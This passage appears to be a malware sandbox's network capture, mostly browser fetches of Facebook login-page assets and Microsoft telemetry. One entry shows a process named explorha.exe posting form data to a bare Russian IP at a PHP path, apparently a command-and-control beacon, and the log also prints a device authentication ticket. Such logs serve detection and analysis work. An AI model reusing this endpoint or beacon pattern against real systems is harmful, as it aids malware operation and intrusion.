          x-fb-debug: 9ULAJpglCoghWov0/gXzvQjpdppA5FA8wRf82bc5hF3FyrqXHDQtebToLTD1a7gXfkXZIh5rFEph5mpyUDTvUA==
          content-length: 7497
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=50, rtx=2, c=184, mss=1357, tbw=330282, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/2xs6jaqwoaL.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/y0/r/2xs6jaqwoaL.png HTTP/2.0
          host: static.xx.fbcdn.net
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 27 Mar 2025 18:48:21 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: 2Fi8j1+aARHK9kIJ1hQ2Vg==
          x-fb-debug: yk7rMo6Uz3dZhUSmBY6SaSQytpcSU4FVtDHxK4MRyKTHgth98LPQ7luA21cl7VB4EajOJl3UXQ2f4HK7Kc1cgg==
          content-length: 3926
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=50, rtx=2, c=184, mss=1357, tbw=353803, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/yl9oHrlTcKH.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yU/r/yl9oHrlTcKH.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sat, 29 Mar 2025 02:40:00 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: lKuo0PsEbfRjTPc5NSg5ow==
          x-fb-debug: ZFudisS4JlWXrICF8YrtX+kzEhiFFN3mDyG7raMYxAdJQ40cE9zoAG4anuPCaXZea8o8YEpEs2NBv41h7dMzPA==
          content-length: 19982
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=50, rtx=2, c=184, mss=1357, tbw=353803, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yc/r/tjuCtNBjbJe.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yc/r/tjuCtNBjbJe.png HTTP/2.0
          host: static.xx.fbcdn.net
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          content-md5: J1auDEHwsxNVFG33Jc7q1Q==
          expires: Sat, 29 Mar 2025 02:45:08 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          x-fb-debug: 3DC7Hn7Nr3EzA6yLwA/ik21m4GqPCa3j02aQ1jajnIiViRA9zyjeyFUCeS3dnJpDZn8/1Xue3hYzm3VUHKPDlg==
          content-length: 3028
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: EXCELLENT; q=0.9, rtt=49, rtx=2, c=190, mss=1357, tbw=378783, tp=-1, tpl=-1, uplat=0, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/JFXH9H_3JTV.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yC/r/JFXH9H_3JTV.png HTTP/2.0
          host: static.xx.fbcdn.net
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          content-md5: JHtUr/NJEh+IxyCf5FbeQQ==
          expires: Wed, 26 Mar 2025 18:16:22 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          origin-agent-cluster: ?0
          x-fb-debug: LfjpiBbWkTia2ayy5hb1SEkWT2pAKRkJzYcHMoJvGa1778ZNWWYxaojTfx2NscnQYoHbsHUDezgdG1/qEXwFzQ==
          content-length: 236
          date: Thu, 04 Apr 2024 22:29:25 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=52, rtx=2, c=190, mss=1357, tbw=382704, tp=-1, tpl=-1, uplat=0, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yl/r/O-j0bAffmS0.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yl/r/O-j0bAffmS0.png HTTP/2.0
          host: static.xx.fbcdn.net
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          content-md5: FsrZR4RQ7tCMOmCQTa5zrw==
          expires: Sat, 29 Mar 2025 04:57:19 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          x-fb-debug: 0V/aQHWYNAiVpGBnP3VvJPcBumimUZhPK/wkVG5iW+IY988l4RyNFTtCpsgHZHLVholdVQZA6rv7NljIa1xBsw==
          content-length: 1753
          date: Thu, 04 Apr 2024 22:29:25 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=190, mss=1357, tbw=383839, tp=-1, tpl=-1, uplat=0, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/y7/r/Jf5r4lBpPKl.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/y7/r/Jf5r4lBpPKl.png HTTP/2.0
          host: static.xx.fbcdn.net
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          content-md5: N6Di29DZPvlxjqN+W85ByQ==
          expires: Sat, 29 Mar 2025 05:06:10 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          x-fb-debug: hnqtSoMQKukUJVQhJdsvDwLlDZdCtrayCvac+/8UNksE2z8hqYkdSmynbUrfHnDvx06WdK+6jgmgnYtPQdphlw==
          content-length: 2053
          date: Thu, 04 Apr 2024 22:29:25 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=190, mss=1357, tbw=385993, tp=-1, tpl=-1, uplat=0, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-us
          DNS
          facebook.com
          MicrosoftEdgeCP.exe
          Remote address:
          8.8.8.8:53
          Request
          facebook.com
          IN A
          Response
          facebook.com
          IN A
          157.240.210.35
        • flag-de
          GET
          https://facebook.com/security/hsts-pixel.gif?c=3.2
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /security/hsts-pixel.gif?c=3.2 HTTP/2.0
          host: facebook.com
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 302
          location: https://fbcdn.net/security/hsts-pixel.gif?c=2
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          access-control-allow-origin: *
          strict-transport-security: max-age=15552000; includeSubDomains
          content-type: text/html; charset="utf-8"
          x-fb-debug: 6Kf9DscESabS9askJk4a+6S4GQDKLnnHGPdpVfXoQIyuoegIHS2A09xPtloYhIqEH/T0tF7la+nO9eoXtTQ96Q==
          content-length: 0
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=52, rtx=0, c=10, mss=1357, tbw=3397, tp=-1, tpl=-1, uplat=45, ullat=0
          alt-svc: h3=":443"; ma=86400
        • flag-us
          DNS
          watson.telemetry.microsoft.com
          Remote address:
          8.8.8.8:53
          Request
          watson.telemetry.microsoft.com
          IN A
          Response
          watson.telemetry.microsoft.com
          IN CNAME
          blobcollector.events.data.trafficmanager.net
          blobcollector.events.data.trafficmanager.net
          IN CNAME
          onedsblobprdeus16.eastus.cloudapp.azure.com
          onedsblobprdeus16.eastus.cloudapp.azure.com
          IN A
          52.168.117.173
        • flag-us
          POST
          https://watson.telemetry.microsoft.com/Telemetry.Request
          Remote address:
          52.168.117.173:443
          Request
          POST /Telemetry.Request HTTP/1.1
          Connection: Keep-Alive
          User-Agent: MSDW
          MSA_DeviceTicket: t=EwC4AlN5BAAUu1V9OkIAK55tj6h8OjaXgvkszYkAAbJ2dlNhMEQlZFBq7miVi8y/Z+0oKLpa/bFCA7a5tSGcNe034dfFu0J59TXlXFcXNNWFcgSJq1bizm0uRQOloFq/kHy5ynXJW61ISeEsiORvB1M3Dj+5qcTsHY4XAf1lOEetP+q+l7JOaxeNQJ+PdmFS9DrIv/ASp4GgxRQzUPPmB3wNORRn9zQvRer9p0zaviw542ZXkhgXlBFne5vW0w/WVI3PcU8NHJDClK1nTRt60FjXEhceTFxj3UTLQwbD/WdlouXcSYiV+jMt5VnWaJvZgw7BBA9h83sa+v59wsZjvobdHYbkl3VU1nKIDn3Sb/8KMWppD6LRHC3cA+f/VWcDZgAACEg2h5xvSx9diAEA5TsnGK6HqnqOlHKdk+jZQP9cCEI6cWC1HTvmixEa5ADyJF1zFnzYgr0hJfPxgwJcc6eOAtm0D8VrIEtIumyIHgirE8skRzj10QxU/OPc8vWHiohqHhLHLkwK+oqtCwjI/kC+btkf2erZojLpAy1jxbfXMG2ezHrS1ZWJlvSfaH12rcNQzcF629nbmDCmNnvX5j2Hm1NHCwG7AgTMxahEfHWmFEmoDUJS/witvd2OclnVqt8jfN+G1nfDadONzkWmwcztjHDurVMrRXfLGcsCQsGmRHgs4IDPrzE0Qh4vjduQ5LDF1l4lYVN3GGexQJUL7TVaU609JhA5P/KXZ0OFiUcjlYNtc5ByU7dnJhkM83h33QKxtOI/3v0joyVJh01xt59ShsrIbRjSi+DGORP7hkIIFZZGOK0VqEhbnI22KfX4Tt43+LY2DfNcTDfPES9Hd3nQJ9Iz+5IM+9obPgBFlZEfbBkYtkSySxw1Qx1J1fmiLupPYt2qcLrn17eQ1MmuiRPUdr96y7gB&p=
          AAD_TenantId: (null)
          Content-Length: 4623
          Host: watson.telemetry.microsoft.com
          Response
          HTTP/1.1 200 200 OK
          Content-Length: 741
          Content-Type: text/xml
          Server: Microsoft-HTTPAPI/2.0
          Strict-Transport-Security: max-age=31536000
          Date: Thu, 04 Apr 2024 22:29:23 GMT
        • flag-us
          DNS
          fbcdn.net
          MicrosoftEdgeCP.exe
          Remote address:
          8.8.8.8:53
          Request
          fbcdn.net
          IN A
          Response
          fbcdn.net
          IN A
          157.240.210.35
        • flag-de
          GET
          https://fbcdn.net/security/hsts-pixel.gif?c=2
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /security/hsts-pixel.gif?c=2 HTTP/2.0
          host: fbcdn.net
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 302
          location: https://fbsbx.com/security/hsts-pixel.gif
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          access-control-allow-origin: *
          strict-transport-security: max-age=31536000; preload; includeSubDomains
          content-type: text/html; charset="utf-8"
          x-fb-debug: QUN7Dm6P+pFxLhSVlbENuRMM3gvr8BxVSBPiwafStyKZxlF4+UUbETbPFYKZSpeM8RUXL0Zwcjubg3xmshK5aQ==
          content-length: 0
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=59, rtx=0, c=10, mss=1357, tbw=3645, tp=-1, tpl=-1, uplat=43, ullat=0
          alt-svc: h3=":443"; ma=86400
        • flag-ru
          POST
          http://193.233.132.56/Pneh2sXQk0/index.php
          explorha.exe
          Remote address:
          193.233.132.56:80
          Request
          POST /Pneh2sXQk0/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 193.233.132.56
          Content-Length: 31
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:23 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          241.110.86.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          241.110.86.104.in-addr.arpa
          IN PTR
          Response
          241.110.86.104.in-addr.arpa
          IN PTR
          a104-86-110-241deploystaticakamaitechnologiescom
        • flag-us
          DNS
          75.159.190.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          75.159.190.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          14.210.240.157.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          14.210.240.157.in-addr.arpa
          IN PTR
          Response
          14.210.240.157.in-addr.arpa
          IN PTR
          xx-fbcdn-shv-01-ham3fbcdnnet
        • flag-us
          DNS
          173.117.168.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          173.117.168.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          fbsbx.com
          MicrosoftEdgeCP.exe
          Remote address:
          8.8.8.8:53
          Request
          fbsbx.com
          IN A
          Response
          fbsbx.com
          IN A
          157.240.210.35
        • flag-de
          GET
          https://fbsbx.com/security/hsts-pixel.gif
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /security/hsts-pixel.gif HTTP/2.0
          host: fbsbx.com
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: image/gif
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-security-policy: default-src data: blob: *.fbcdn.net *.fbsbx.com;script-src *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *.fbcdn.net *.fbsbx.com;connect-src *.fbcdn.net attachment.fbsbx.com blob: 'self' *.fbsbx.com;font-src *.fbsbx.com fbsbx.com *.fbcdn.net data:;img-src *.fbsbx.com *.fbcdn.net data: blob:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          pragma: no-cache
          cache-control: private, no-cache, no-store, must-revalidate
          expires: Sat, 01 Jan 2000 00:00:00 GMT
          x-content-type-options: nosniff
          x-xss-protection: 0
          x-frame-options: DENY
          access-control-allow-origin: *
          strict-transport-security: max-age=31536000; preload; includeSubDomains
          x-fb-debug: Vt4VMnLPVUFTMfvgnWE0D1GEXNNw0FFx5UqY2TIw4Syk2KpzW6fF9A4Toy7TrPZCVNDyyebEPKagW3YK1CzqGg==
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=53, rtx=0, c=10, mss=1357, tbw=3645, tp=-1, tpl=-1, uplat=46, ullat=0
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/4Kv5U5b1o3f.png
          MicrosoftEdge.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yi/r/4Kv5U5b1o3f.png HTTP/2.0
          host: static.xx.fbcdn.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          dnt: 1
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          content-md5: qBpef3GuQVPm+IjxyS5eEQ==
          expires: Sat, 29 Mar 2025 04:41:08 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          origin-agent-cluster: ?0
          x-fb-debug: G59QoWCX5JU/sKtVVuhyDKNBFLMZ9t4bNsEtNhBHIk2jvSvY7lOwjTpb43qQlDH9YmwVCiBhREqKPrvuQWCqvA==
          content-length: 610
          date: Thu, 04 Apr 2024 22:29:25 GMT
          x-fb-connection-quality: EXCELLENT; q=0.9, rtt=49, rtx=0, c=13, mss=1357, tbw=3396, tp=-1, tpl=-1, uplat=0, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-us
          DNS
          scontent.xx.fbcdn.net
          MicrosoftEdgeCP.exe
          Remote address:
          8.8.8.8:53
          Request
          scontent.xx.fbcdn.net
          IN A
          Response
          scontent.xx.fbcdn.net
          IN A
          157.240.210.14
        • flag-us
          DNS
          scontent.xx.fbcdn.net
          MicrosoftEdgeCP.exe
          Remote address:
          8.8.8.8:53
          Request
          scontent.xx.fbcdn.net
          IN A
        • flag-ru
          POST
